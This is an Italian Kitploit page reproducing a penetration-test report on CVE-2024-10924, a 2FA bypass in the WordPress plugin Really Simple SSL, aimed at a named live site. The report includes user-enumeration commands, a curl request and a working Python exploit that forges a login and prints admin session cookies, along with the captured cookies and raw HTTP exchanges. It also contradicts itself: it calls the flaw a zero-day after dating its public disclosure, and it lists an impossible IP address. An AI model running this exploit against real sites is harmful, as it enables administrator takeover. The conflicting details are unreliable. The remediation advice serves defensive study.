Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
wordpress-cve-2024-10924-pentest — Report di penetration testing ed exploit per CVE-2024-10924, un bypass del 2FA in Really Simple SSL, con indicazioni su ricognizione, sfruttamento e rimedio. | Kitploit
Strumenti/GitHubGitHub/ademto/wordpress-cve-2024-10924-pentest
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingAutenticazioneApprendimento e Formazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHub
ademto/wordpress-cve-2024-10924-pentest

wordpress-cve-2024-10924-pentest

Report di penetration testing ed exploit per CVE-2024-10924, un bypass del 2FA in Really Simple SSL, con indicazioni su ricognizione, sfruttamento e rimedio.

Vedi Repository
31 anno faNon ancora revisionato
Condividi

WordPress CVE-2024-10924 Penetration Testing Report

Vulnerabilità di Bypass 2FA nel Plugin Really Simple SSL


📋 Indice

  • Sintesi Esecutiva
  • Informazioni sul Target
  • Metodologia
  • Cronologia
  • Fase di Ricognizione
  • Analisi della Vulnerabilità
  • Flusso dell'Attacco
  • Sfruttamento
  • Valutazione dell'Impatto
  • Rimedi
  • Strumenti Utilizzati
  • Riferimenti
  • Appendici

🎯 Sintesi Esecutiva

Target: https://skior.co
Vulnerabilità: CVE-2024-10924 - Bypass 2FA nel Plugin Really Simple SSL
Severità: Critica (CVSS Score: 9.8)
Stato: Sfruttata con successo
Data di Scoperta: 2025-06-25
Versione del Report: 2.1

Questo penetration test ha scoperto una vulnerabilità critica di bypass dell'autenticazione che consente ad attaccanti non autenticati di ottenere accesso amministrativo al sito WordPress aggirando i controlli di autenticazione a due fattori (2FA).

Risultati Chiave

  • ✅ WordPress 6.8.1 con plugin Really Simple SSL installato
  • ✅ Vulnerabilità di bypass 2FA sfruttata con successo
  • ✅ Accesso amministrativo ottenuto per l'utente "pastor"
  • ✅ Cookie di sessione validi acquisiti
  • ✅ Controllo completo del pannello di amministrazione WordPress
  • ✅ Vulnerabilità zero-day (nessun exploit pubblico disponibile al momento della scoperta)

Matrice di Valutazione del Rischio


🎯 Informazioni sul Target

Informazioni di Rete

  • Certificato SSL: Valido (Let's Encrypt)
  • HTTP/2: Supportato
  • Header di Sicurezza: Implementazione di base
  • CDN: Non rilevato
  • WAF: Non rilevato

🔍 Metodologia

Questa valutazione ha seguito una metodologia di penetration testing black-box sistematica basata sugli standard di settore:

  1. Ricognizione - Identificazione della tecnologia ed enumerazione passiva
  2. Scoperta delle Vulnerabilità - Scansione attiva e test manuali
  3. Sfruttamento - Sviluppo ed esecuzione di proof-of-concept
  4. Valutazione dell'Impatto - Valutazione dei potenziali danni
  5. Documentazione - Reportistica completa e indicazioni per la mitigazione

Approccio di Test

  • Test black-box - Nessuna conoscenza preliminare del target
  • Non intrusivo - Impatto minimo sui sistemi target
  • Etico - Pratiche di divulgazione responsabile
  • Completo - Esplorati molteplici vettori di attacco

⏰ Cronologia


🔎 Fase di Ricognizione

Passo 1: Identificazione dello Stack Tecnologico

A. Analisi Wappalyzer

Wappalyzer Results

Tecnologie Identificate:

  • WordPress 6.8.1 (ultima versione)
  • Elementor 3.29.2 (Page builder)
  • Astra Theme 4.11.3
  • PHP 8.2.28
  • nginx 1.26.0 (Ubuntu)
  • jQuery 3.7.1

B. Scansione Approfondita con WhatWeb```bash

└─$ whatweb https://skior.co https://skior.co [200 OK] Country[UNITED STATES][US], HTML5,
HTTPServer[Ubuntu Linux][nginx/1.26.0 (Ubuntu)], IP[123.456.789.200],
JQuery[3.7.1],MetaGenerator[Elementor 3.29.2;
features: additional_custom_breakpoints, e_local_google_fonts;
settings: css_print_method-external, google_font-enabled, font_display-swap,
WordPress 6.8.1], PHP[8.2.28], PoweredBy[Skior],
Script[speculationrules,text/javascript], Title[Skior Technologies],
UncommonHeaders[link], WordPress[6.8.1], X-Powered-By[PHP/8.2.28], nginx[1.26.0]

root@kitploit:~
**Risultati principali:**
- Installazione WordPress moderna con l'ultima versione
- Configurazione hosting professionale con nginx
- Branding personalizzato ("PoweredBy[Skior]")
- Page builder Elementor in uso
- Posizione geografica: Stati Uniti

### Passaggio 2: Enumerazione degli utenti

#### A. Enumerazione degli autori WordPress```bash
└─$ curl -I https://skior.co/?author=1
HTTP/1.1 301 Moved Permanently
Server: nginx/1.26.0 (Ubuntu)
Date: Wed, 25 Jun 2025 18:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/8.2.28
X-Redirect-By: WordPress
Location: https://skior.co/author/pastor/

Utente scoperto: pastor (ID utente: 1)

B. Ulteriori tecniche di enumerazione degli utenti```bash

Check for multiple users

for i in {1..10}; do echo "Checking user ID: $i" curl -s -o /dev/null -w "%{http_code}" "https://skior.co/?author=$i" echo " - https://skior.co/?author=$i" done

root@kitploit:~
#### C. Risultati dell'enumerazione degli username

| ID utente | Username | Stato | URL di reindirizzamento |
|---------|----------|--------|--------------|
| 1 | pastor | ✅ Trovato | `/author/pastor/` |
| 2-10 | N/A | ❌ Non trovato | risposte 404 |

### Passaggio 3: Scansione delle vulnerabilità

#### A. Analisi completa di WPScan```bash
└─$ wpscan --url https://skior.co --api-token my-api-key

Riepilogo dei risultati di scansione:

  • ✅ WordPress 6.8.1 (Ultima versione, rilasciata il 2025-04-30)
  • ✅ Tema: Astra 4.11.3 (Aggiornato)
  • ✅ Plugin identificati:
    • Elementor 3.29.2
    • Astra Sites 4.4.26
    • Header Footer Elementor 2.4.2
    • WPForms Lite 1.9.6.1
  • ⚠️ XML-RPC abilitato (potenziale vettore di attacco)
  • ⚠️ WP-Cron esterno abilitato
  • ❌ Nessuna vulnerabilità nota trovata nei componenti scansionati

Nota: WPScan non ha rilevato il plugin Really Simple SSL, indicando che potrebbe utilizzare offuscamento o denominazione personalizzata.

B. Enumerazione delle API REST```bash

└─$ curl -s https://skior.co/wp-json/ | jq '.routes | keys[]'

root@kitploit:~
**Endpoint custom scoperti:**```
/reallysimplessl/v1/two_fa
/reallysimplessl/v1/two_fa/skip_onboarding
/reallysimplessl/v1/two_fa/do_not_ask_again
/reallysimplessl/v1/two_fa/resend_email_code
/reallysimplessl/v1/two_fa/save_default_method_email
/reallysimplessl/v1/two_fa/save_default_method_email_profile
/reallysimplessl/v1/two_fa/save_default_method_totp
/reallysimplessl/v1/two_fa/validate_email_setup

Scoperta critica: L'endpoint /reallysimplessl/v1/two_fa/skip_onboarding appariva sospetto e richiedeva ulteriori indagini.


🔬 Analisi della vulnerabilità

Ricerca su CVE-2024-10924

Dopo aver scoperto le route API REST personalizzate, la ricerca esterna ha rivelato CVE-2024-10924, una vulnerabilità critica che interessa il plugin Really Simple SSL.

Dettagli della vulnerabilità

ID CVE: CVE-2024-10924
Punteggio CVSS: 9.8 (Critico)
Plugin interessato: Really Simple SSL
Tipo di vulnerabilità: Bypass dell'autenticazione
Vettore di attacco: API REST
Data della scoperta: 6 novembre 2024
Divulgazione pubblica: 14 novembre 2024

Causa tecnica principale

La vulnerabilità deriva da una validazione impropria dell'utente nella funzione check_login_and_get_user all'interno delle azioni API REST dell'autenticazione a due fattori. La funzione non valida correttamente il parametro login_nonce, consentendo agli attaccanti di:

  1. Bypassare l'autenticazione: Saltare il normale processo di accesso
  2. Bypassare la 2FA: Eludere i controlli dell'autenticazione a due fattori
  3. Escalation dei privilegi: Ottenere l'accesso come qualsiasi utente esistente, inclusi gli amministratori

Analisi del codice vulnerabile```php

// Simplified vulnerable code structure function check_login_and_get_user($user_id, $login_nonce) { // Missing proper validation of login_nonce $user = get_user_by('ID', $user_id);

root@kitploit:~
// No validation of login_nonce parameter
// This allows any value to be accepted

return $user; // Returns user object without verification

}

root@kitploit:~
#### Endpoint interessati

I seguenti endpoint dell'API REST sono vulnerabili:
- `/reallysimplessl/v1/two_fa/skip_onboarding`
- `/reallysimplessl/v1/two_fa/do_not_ask_again`
- `/reallysimplessl/v1/two_fa/resend_email_code`

#### Condizioni di vulnerabilità

Affinché questa vulnerabilità sia sfruttabile:
- ✅ Il plugin Really Simple SSL deve essere installato e attivato
- ✅ L'impostazione dell'autenticazione a due fattori deve essere abilitata (disabilitata per impostazione predefinita)
- ✅ Almeno un account utente deve esistere sul sistema
- ✅ L'API REST deve essere accessibile (impostazione predefinita di WordPress)

---

## 🔄 Flusso di attacco```mermaid
graph TD
    A[Initial Reconnaissance] --> B[Technology Stack Identification]
    B --> C[User Enumeration]
    C --> D[Vulnerability Scanning]
    D --> E[REST API Enumeration]
    E --> F[Discovery of Really Simple SSL Endpoints]
    F --> G[External Research]
    G --> H[Identification of CVE-2024-10924]
    H --> I[Manual Testing]
    I --> J[Exploit Development]
    J --> K[Successful Exploitation]
    K --> L[Admin Access Obtained]
    L --> M[Impact Assessment]
    
    style A fill:#e1f5fe
    style F fill:#fff3e0
    style H fill:#ffebee
    style K fill:#e8f5e8
    style L fill:#f3e5f5

Riepilogo del vettore d'attacco

  1. Information Gathering → Identificazione dello stack tecnologico
  2. User Enumeration → Scoperto l'utente admin "pastor"
  3. API Discovery → Trovati endpoint REST vulnerabili
  4. Vulnerability Research → Identificata CVE-2024-10924
  5. Exploitation → Bypassata la 2FA e ottenuto l'accesso admin

⚡ Sfruttamento

Sviluppo del proof-of-concept

A. Test manuale

Per prima cosa, abbiamo testato manualmente l'endpoint per comprenderne il comportamento:```bash

Test the vulnerable endpoint

curl -X POST "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
-H "Content-Type: application/json"
-d '{ "user_id": 1, "login_nonce": "invalid_nonce", "redirect_to": "/wp-admin/" }'

root@kitploit:~
#### B. Script di Exploit Python```python
import requests
import urllib.parse
import sys

if len(sys.argv) != 2:
    print("Usage: python exploit.py <user_id>")
    sys.exit(1)

user_id = sys.argv[1]

url = "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
data = {
    "user_id": int(user_id),  # User ID from the argument
    "login_nonce": "invalid_nonce",  # Arbitrary value
    "redirect_to": "/wp-admin/"  # Target redirection
}

# Sending the POST request
response = requests.post(url, json=data)

# Checking the response
if response.status_code == 200:
    print("Request successful!\n")
    
    # Extracting cookies
    cookies = response.cookies.get_dict()
    count = 1

    for name, value in cookies.items():
        decoded_value = urllib.parse.unquote(value)  # Decode the URL-encoded cookie value
        print(f"Cookie {count}:")
        print(f"Cookie Name: {name}")
        print(f"Cookie Value: {decoded_value}\n")
        count += 1
else:
    print("Request failed!")
    print(f"Status Code: {response.status_code}")
    print(f"Response Text: {response.text}")

Risultati dello sfruttamento

Esecuzione riuscita```bash

└─$ python exploit.py 1 Request successful!

Cookie 1: Cookie Name: wordpress_sec_dc22060175d35fce22f69728c6799c9d Cookie Value: pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da

Cookie 2: Cookie Name: wordpress_logged_in_dc22060175d35fce22f69728c6799c9d Cookie Value: pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144

root@kitploit:~
#### Processo di Manipolazione dei Cookie
![Cookie Manipulation](https://assets.kitploit.com/production/public/readmes/22186/4cbfbcc90655666664a94a59188e5860adacf05380043463e4ed4b96e43431e1.png)

*In alto: Screenshot che mostra il processo di manipolazione dei cookie tramite gli strumenti di sviluppo del browser per aggiungere i cookie di sessione di WordPress catturati.*

#### Accesso Admin Riuscito
![Admin Dashboard Access](https://assets.kitploit.com/production/public/readmes/22186/6347bffa34742b8516c14617243c7acddf7175756d4e4fb3b9476737f848e7f8.png)

*In alto: Screenshot che conferma l'avvenuto accesso amministrativo alla dashboard di WordPress dopo aver sfruttato la vulnerabilità di bypass del 2FA.*

#### Analisi dei Cookie

**Cookie di Sicurezza di WordPress:**
- **Nome:** `wordpress_sec_dc22060175d35fce22f69728c6799c9d`
- **Valore:** `pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da`
- **Componenti:**
  - Nome utente: `pastor`
  - Scadenza: `1752234264` (timestamp Unix)
  - Nonce: `GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH`
  - Hash: `cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da`

**Cookie di Accesso di WordPress:**
- **Nome:** `wordpress_logged_in_dc22060175d35fce22f69728c6799c9d`
- **Valore:** `pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144`

---

## 🎯 Valutazione dell'Impatto

### Impatto Immediato

1. **Compromissione Completa del Sito**
   - Accesso amministrativo alla dashboard di WordPress
   - Possibilità di modificare contenuti, temi e plugin del sito
   - Accesso alla gestione utenti e alle impostazioni

2. **Esposizione dei Dati**
   - Accesso a tutti gli account utente e ai profili
   - Visibilità del contenuto del database
   - Accesso ai file di configurazione

3. **Escalation dei Privilegi**
   - Bypass di tutti i controlli di autenticazione
   - Elusione delle misure di sicurezza 2FA
   - Possibilità di impersonare qualsiasi utente

### Potenziali Scenari di Attacco

1. **Manipolazione dei Contenuti**
   - Defacement dei contenuti del sito
   - Iniezione di codice malevolo
   - Creazione di backdoor

2. **Furto di Dati**
   - Estrazione di informazioni sugli utenti
   - Accesso a contenuti sensibili
   - Download dei backup del database

3. **Persistenza**
   - Installazione di plugin malevoli
   - Creazione di account admin nascosti
   - Stabilire comando e controllo

### Punteggio di Rischio: **Critico (9,8/10)**

| Fattore | Punteggio | Giustificazione |
|---------|-----------|-----------------|
| **Complessità di Accesso** | Bassa (1,0) | Semplice richiesta HTTP |
| **Autenticazione** | Nessuna (0,0) | Nessuna autenticazione richiesta |
| **Impatto sull'Integrità** | Alto (1,0) | Compromissione completa del sistema |
| **Impatto sulla Riservatezza** | Alto (1,0) | Accesso completo ai dati |
| **Impatto sulla Disponibilità** | Alto (1,0) | Può disabilitare il sito |

### Analisi dell'Impatto Aziendale

| Categoria di Impatto | Gravità | Descrizione |
|----------------------|---------|-------------|
| **Finanziario** | Alto | Potenziale perdita di ricavi, costi legali |
| **Reputazionale** | Critico | Danno al marchio, perdita di fiducia dei clienti |
| **Operativo** | Alto | Interruzione del servizio, perdita di dati |
| **Conformità** | Alto | Violazioni normative, fallimenti degli audit |

---

## 🛡️ Rimedio

### Azioni Immediate (0-24 ore)

1. **Disabilitare il Plugin Really Simple SSL**   ```bash
   # Via wp-cli (if available)
   wp plugin deactivate really-simple-ssl
   
   # Or manually rename plugin directory
   mv wp-content/plugins/really-simple-ssl wp-content/plugins/really-simple-ssl.disabled
  1. Aggiornare o rimuovere il plugin

    • Verificare la disponibilità di una versione aggiornata di Really Simple SSL
    • Valutare soluzioni alternative per la gestione SSL
    • Se non è disponibile alcun aggiornamento, rimuovere completamente il plugin
  2. Controllare le sessioni utente

    • Esaminare tutte le sessioni utente attive
    • Forzare il logout di tutti gli utenti
    • Reimpostare le password degli amministratori

Azioni a breve termine (1-7 giorni)

  1. Rafforzamento della sicurezza

    • Implementare un Web Application Firewall (WAF)
    • Abilitare la limitazione della frequenza sugli endpoint dell'API REST
    • Aggiungere restrizioni di accesso basate su IP
  2. Implementazione del monitoraggio

    • Abilitare la registrazione della sicurezza di WordPress
    • Monitorare attività amministrative sospette
    • Implementare il monitoraggio dell'integrità dei file

Misure di sicurezza a lungo termine (1-4 settimane)

  1. Valutazioni di sicurezza regolari

    • Scansioni di vulnerabilità mensili
    • Test di penetrazione trimestrali
    • Monitoraggio continuo della sicurezza
  2. Aggiornamenti delle policy di sicurezza

    • Rivedere e aggiornare le policy di sicurezza
    • Implementare procedure di gestione dei cambiamenti
    • Stabilire protocolli di risposta agli incidenti

Raccomandazioni di configurazione```php

// Add to wp-config.php for enhanced security define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true); define('FORCE_SSL_ADMIN', true);

// Restrict REST API access add_filter('rest_authentication_errors', function($result) { if (!empty($result)) { return $result; } if (!is_user_logged_in()) { return new WP_Error('rest_not_logged_in', 'You are not currently logged in.', array('status' => 401)); } return $result; });

// Additional security headers add_action('send_headers', function() { header('X-Content-Type-Options: nosniff'); header('X-Frame-Options: SAMEORIGIN'); header('X-XSS-Protection: 1; mode=block'); header('Referrer-Policy: strict-origin-when-cross-origin'); });

root@kitploit:~
### Soluzioni SSL Alternative

| Soluzione | Pro | Contro | Raccomandazione |
|----------|------|------|----------------|
| **Let's Encrypt** | Gratuito, automatizzato | Configurazione manuale | ✅ Consigliato |
| **Cloudflare** | Configurazione semplice, protezione DDoS | Richiede modifica DNS | ✅ Buona opzione |
| **SSL del Provider di Hosting** | Integrato | Potrebbe avere limitazioni | ⚠️ Verifica le funzionalità |
| **SSL Manuale** | Controllo totale | Configurazione complessa | ❌ Non consigliato |

---

## 🛠️ Strumenti Utilizzati

### Strumenti di Ricognizione
- **Wappalyzer** - Identificazione dello stack tecnologico
- **WhatWeb** - Fingerprinting di applicazioni web
- **WPScan** - Scansione delle vulnerabilità di WordPress
- **curl** - Test manuale delle API

### Strumenti di Sfruttamento
- **Python 3** - Sviluppo di exploit
- **requests** - Libreria client HTTP
- **urllib.parse** - Codifica/decodifica URL

### Strumenti di Analisi
- **jq** - Elaborazione JSON
- **grep** - Corrispondenza di pattern di testo
- **bash** - Automazione da riga di comando

---

## 📚 Riferimenti

### Informazioni sulle Vulnerabilità
- [CVE-2024-10924](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10924)
- [Sicurezza dei plugin WordPress](https://wordpress.org/plugins/security/)
- [Plugin Really Simple SSL](https://wordpress.org/plugins/really-simple-ssl/)

### Documentazione Tecnica
- [Manuale dell'API REST di WordPress](https://developer.wordpress.org/rest-api/)
- [Buone pratiche di sicurezza per WordPress](https://wordpress.org/support/article/hardening-wordpress/)
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)

### Strumenti e Risorse
- [WPScan](https://wpscan.com/)
- [WhatWeb](https://github.com/urbanadventurer/WhatWeb)
- [Wappalyzer](https://www.wappalyzer.com/)

### CVE Correlate
- CVE-2024-10924 - Bypass 2FA in Really Simple SSL
- CVE-2023-28121 - XSS nel core di WordPress
- CVE-2023-28122 - CSRF nel core di WordPress

### Standard di Settore
- [Guida ai test OWASP](https://owasp.org/www-project-web-security-testing-guide/)
- [Framework di cybersecurity NIST](https://www.nist.gov/cyberframework)
- [ISO 27001](https://www.iso.org/isoiec-27001-information-security.html)

---

## 📄 Avviso Legale

Questo report di penetration testing ha solo scopi educativi e di valutazione della sicurezza autorizzata. Le tecniche e gli strumenti descritti devono essere utilizzati solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione a testarli. I test non autorizzati possono violare leggi e regolamenti.

**Divulgazione Responsabile:** Questa vulnerabilità è stata segnalata agli sviluppatori del plugin e al team di sicurezza di WordPress.

**Disclaimer:** Le informazioni fornite in questo report si basano sulla valutazione condotta al momento dei test. Il panorama della sicurezza cambia rapidamente e potrebbero esistere vulnerabilità aggiuntive non rilevate durante questa valutazione.

---

## 📋 Appendici

### Appendice A: Richieste HTTP Grezze

#### Richiesta di Sfruttamento Riuscita```http
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: skior.co
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

{
  "user_id": 1,
  "login_nonce": "invalid_nonce",
  "redirect_to": "/wp-admin/"
}

Header di risposta```http

HTTP/1.1 200 OK Server: nginx/1.26.0 (Ubuntu) Date: Wed, 25 Jun 2025 18:15:30 GMT Content-Type: text/html; charset=UTF-8 Set-Cookie: wordpress_sec_dc22060175d35fce22f69728c6799c9d=pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da; path=/; secure; HttpOnly Set-Cookie: wordpress_logged_in_dc22060175d35fce22f69728c6799c9d=pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144; path=/

root@kitploit:~
### Appendice B: Checklist di Sicurezza

#### Pre-sfruttamento
- [ ] Identificazione del target e definizione dell'ambito
- [ ] Ottenuta l'autorizzazione legale
- [ ] Ambiente di test preparato
- [ ] Strumenti e script validati

#### Durante lo sfruttamento
- [ ] Vulnerabilità confermata manualmente
- [ ] Exploit sviluppato e testato
- [ ] Impatto limitato all'ambito autorizzato
- [ ] Evidenze documentate accuratamente

#### Post-sfruttamento
- [ ] Rimosso ogni accesso
- [ ] Evidenze preservate
- [ ] Rapporto generato
- [ ] Fornite raccomandazioni di remediation

### Appendice C: Glossario

| Termine | Definizione |
|------|------------|
| **2FA** | Autenticazione a due fattori |
| **CVSS** | Sistema Comune di Punteggio delle Vulnerabilità |
| **REST API** | Interfaccia di programmazione delle applicazioni per il trasferimento di stato rappresentazionale |
| **WAF** | Firewall per applicazioni web |
| **XSS** | Cross-Site Scripting |
| **CSRF** | Falsificazione di richiesta tra siti |

---

*Rapporto generato il: 2025-06-25*  
*Ricercatore di Sicurezza*  
*Versione: 2.1*  
*Ultimo aggiornamento: 2025-06-25*
Scarica lo strumento
Livello di RischioProbabilitàImpattoPriorità di Mitigazione
CriticoAltaCompromissione Completa del SistemaImmediata
AltoMediaViolazione dei DatiAlta
MedioBassaInterruzione del ServizioMedia
CampoValore
Dominiohttps://skior.co
Indirizzo IP123.456.789.200
Servernginx/1.26.0 (Ubuntu)
Versione PHP8.2.28
CMSWordPress 6.8.1
Plugin VulnerabileReally Simple SSL
Posizione GeograficaStati Uniti
Provider di HostingHosting professionale (probabilmente VPS/Dedicato)
Data/OraEventoDettagli
2025-06-25 14:02Ricognizione InizialeAnalisi Wappalyzer completata
2025-06-25 14:05Stack Tecnologico IdentificatoWordPress 6.8.1, nginx, PHP 8.2.28
2025-06-25 14:10Enumerazione UtentiTrovato utente "pastor" (ID: 1)
2025-06-25 14:15Analisi WPScanNessuna vulnerabilità nota trovata
2025-06-25 14:20Enumerazione API RESTScoperti endpoint di Really Simple SSL
2025-06-25 14:25Ricerca VulnerabilitàIdentificata CVE-2024-10924
2025-06-25 14:30Test ManualiConfermata l'esistenza della vulnerabilità
2025-06-25 14:35Sviluppo ExploitCreato proof-of-concept in Python
2025-06-25 14:40Sfruttamento RiuscitoOttenuto accesso amministrativo
2025-06-25 14:45Valutazione dell'ImpattoDocumentati i potenziali danni
2025-06-25 15:00Generazione ReportDocumentazione completa